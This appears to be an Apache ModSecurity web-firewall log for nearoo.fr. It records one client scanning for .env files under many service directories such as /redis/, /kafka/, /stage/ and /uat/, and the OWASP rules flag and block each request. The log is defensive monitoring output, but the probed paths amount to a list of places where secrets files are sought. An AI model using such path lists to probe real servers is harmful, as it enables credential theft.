[Mon May 11 16:54:50.891857 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mongodb/.env"] [unique_id "agHtukWKUxpmnkK7zHyHgwAAAQI"]
[Mon May 11 16:54:51.045652 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/redis/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhAAAAQI"]
[Mon May 11 16:54:51.045871 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/redis/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhAAAAQI"]
[Mon May 11 16:54:51.046099 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/redis/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhAAAAQI"]
[Mon May 11 16:54:51.234243 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/elasticsearch/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhQAAAQI"]
[Mon May 11 16:54:51.234414 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/elasticsearch/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhQAAAQI"]
[Mon May 11 16:54:51.234635 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/elasticsearch/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhQAAAQI"]
[Mon May 11 16:54:51.421941 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/rabbitmq/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhgAAAQI"]
[Mon May 11 16:54:51.422218 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/rabbitmq/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhgAAAQI"]
[Mon May 11 16:54:51.422465 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/rabbitmq/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhgAAAQI"]
[Mon May 11 16:54:51.581216 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/kafka/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhwAAAQI"]
[Mon May 11 16:54:51.581426 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/kafka/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhwAAAQI"]
[Mon May 11 16:54:51.581650 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/kafka/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHhwAAAQI"]
[Mon May 11 16:54:51.754115 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/queue/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHiAAAAQI"]
[Mon May 11 16:54:51.754354 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/queue/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHiAAAAQI"]
[Mon May 11 16:54:51.754575 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/queue/.env"] [unique_id "agHtu0WKUxpmnkK7zHyHiAAAAQI"]
[Mon May 11 16:54:52.093526 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/worker/.env"] [unique_id "agHtvEWKUxpmnkK7zHyHiQAAAQI"]
[Mon May 11 16:54:52.093708 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/worker/.env"] [unique_id "agHtvEWKUxpmnkK7zHyHiQAAAQI"]
[Mon May 11 16:54:52.093917 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/worker/.env"] [unique_id "agHtvEWKUxpmnkK7zHyHiQAAAQI"]
[Mon May 11 16:54:52.692953 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/job/.env"] [unique_id "agHtvFV4kyjgo4bQBUhexgAAAMw"]
[Mon May 11 16:54:52.693238 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/job/.env"] [unique_id "agHtvFV4kyjgo4bQBUhexgAAAMw"]
[Mon May 11 16:54:52.695021 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/job/.env"] [unique_id "agHtvFV4kyjgo4bQBUhexgAAAMw"]
[Mon May 11 16:54:52.890215 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/test/.env"] [unique_id "agHtvFV4kyjgo4bQBUheyAAAAMw"]
[Mon May 11 16:54:52.890438 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/test/.env"] [unique_id "agHtvFV4kyjgo4bQBUheyAAAAMw"]
[Mon May 11 16:54:52.890673 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/test/.env"] [unique_id "agHtvFV4kyjgo4bQBUheyAAAAMw"]
[Mon May 11 16:54:53.128028 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/qa/.env"] [unique_id "agHtvVV4kyjgo4bQBUheyQAAAMw"]
[Mon May 11 16:54:53.128222 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/qa/.env"] [unique_id "agHtvVV4kyjgo4bQBUheyQAAAMw"]
[Mon May 11 16:54:53.128438 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/qa/.env"] [unique_id "agHtvVV4kyjgo4bQBUheyQAAAMw"]
[Mon May 11 16:54:53.382955 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/preview/.env"] [unique_id "agHtvVV4kyjgo4bQBUheygAAAMw"]
[Mon May 11 16:54:53.383201 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/preview/.env"] [unique_id "agHtvVV4kyjgo4bQBUheygAAAMw"]
[Mon May 11 16:54:53.383435 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/preview/.env"] [unique_id "agHtvVV4kyjgo4bQBUheygAAAMw"]
[Mon May 11 16:54:53.547942 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/beta/.env"] [unique_id "agHtvVV4kyjgo4bQBUheywAAAMw"]
[Mon May 11 16:54:53.548193 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/beta/.env"] [unique_id "agHtvVV4kyjgo4bQBUheywAAAMw"]
[Mon May 11 16:54:53.548453 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/beta/.env"] [unique_id "agHtvVV4kyjgo4bQBUheywAAAMw"]
[Mon May 11 16:54:53.717952 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/uat/.env"] [unique_id "agHtvVV4kyjgo4bQBUhezgAAAMw"]
[Mon May 11 16:54:53.718138 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/uat/.env"] [unique_id "agHtvVV4kyjgo4bQBUhezgAAAMw"]
[Mon May 11 16:54:53.718434 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/uat/.env"] [unique_id "agHtvVV4kyjgo4bQBUhezgAAAMw"]
[Mon May 11 16:54:53.948939 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/stage/.env"] [unique_id "agHtvVV4kyjgo4bQBUhe0AAAAMw"]
[Mon May 11 16:54:53.949185 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/stage/.env"] [unique_id "agHtvVV4kyjgo4bQBUhe0AAAAMw"]
[Mon May 11 16:54:53.949440 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/stage/.env"] [unique_id "agHtvVV4kyjgo4bQBUhe0AAAAMw"]
